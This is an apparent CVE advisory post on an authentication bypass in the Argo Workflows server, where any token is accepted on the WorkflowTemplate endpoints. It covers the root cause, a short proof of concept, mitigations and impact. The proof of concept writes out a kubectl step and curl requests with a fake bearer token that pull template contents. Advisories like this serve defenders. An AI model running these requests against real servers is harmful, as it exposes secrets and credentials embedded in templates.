Listen to this Post
The vulnerability exists in the Argo Workflows server endpoints for WorkflowTemplates and ClusterWorkflowTemplates. The server lacks proper authorization checks on these endpoints, allowing any client with any Authorization header—even a completely invalid token like “Bearer nothing”—to retrieve template contents. The vulnerable code resides in the server’s template handlers where the informers use the server’s service account privileges to read from Kubernetes . When a request hits `/api/v1/workflow-templates/{namespace}/{name}` or the cluster-wide equivalent, the server fails to validate the token’s validity or the user’s permissions before serving the response. Since the informers run with the server’s elevated privileges (rest config using the service account), they can read all templates regardless of the requester’s identity. This creates a complete authentication bypass where template data flows from the Kubernetes API through the Argo server to any unauthenticated client that can reach the Argo server endpoint .
DailyCVE Form:
Platform: Argo Workflows
Version: v3.x (unpatched)
Vulnerability: Authentication Bypass
Severity: Critical
date: 14 Oct 2025
Prediction: mid-Nov 2025
What Undercode Say:
Analytics
The vulnerability affects all Argo Workflows deployments where the Argo Server is exposed to networks accessible by potential attackers. The root cause is missing token validation in the template retrieval handlers combined with informers that use server service account privileges. Attackers can enumerate template names and extract sensitive embedded content including Secrets, artifact repository credentials, environment variables, and service account configurations .
Exploit:
Create a malicious workflow template with embedded secret cat > poc-template.yaml << 'EOF' apiVersion: argoproj.io/v1alpha1 kind: WorkflowTemplate metadata: name: leak-workflow-template namespace: argo spec: templates: - name: make-secret resource: action: create manifest: | apiVersion: v1 kind: Secret metadata: name: leaked-secret type: Opaque data: password: c3VwZXJzZWNyZXQ= EOF Apply the template kubectl apply -f poc-template.yaml Exploit the authentication bypass curl -sk -H "Authorization: Bearer nothing" \ "https://argo-server:2746/api/v1/workflow-templates/argo/leak-workflow-template" | jq . For cluster-wide templates curl -sk -H "Authorization: Bearer invalid" \ "https://argo-server:2746/api/v1/cluster-workflow-templates/leak-cluster-template"
Protection from this CVE
- Upgrade to patched version (3.6.12 or 3.7.3) immediately
- Implement network policies to restrict access to Argo Server endpoints
3. Use mutual TLS (mTLS) for service-to-service authentication
- Deploy API gateway with proper authentication before Argo Server
- Audit template contents for embedded secrets; migrate to external secret stores
- Monitor logs for requests with invalid tokens accessing template endpoints
Impact
Any unauthenticated attacker with network access to the Argo Server can retrieve all WorkflowTemplates and ClusterWorkflowTemplates, exposing:
– Kubernetes Secret manifests embedded in workflows
– Artifact repository credentials (S3, GCS, etc.)
– Service account tokens and usage patterns
– Environment variables containing sensitive data
– Internal network paths and configurations
– Source code and business logic embedded in workflow definitions
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

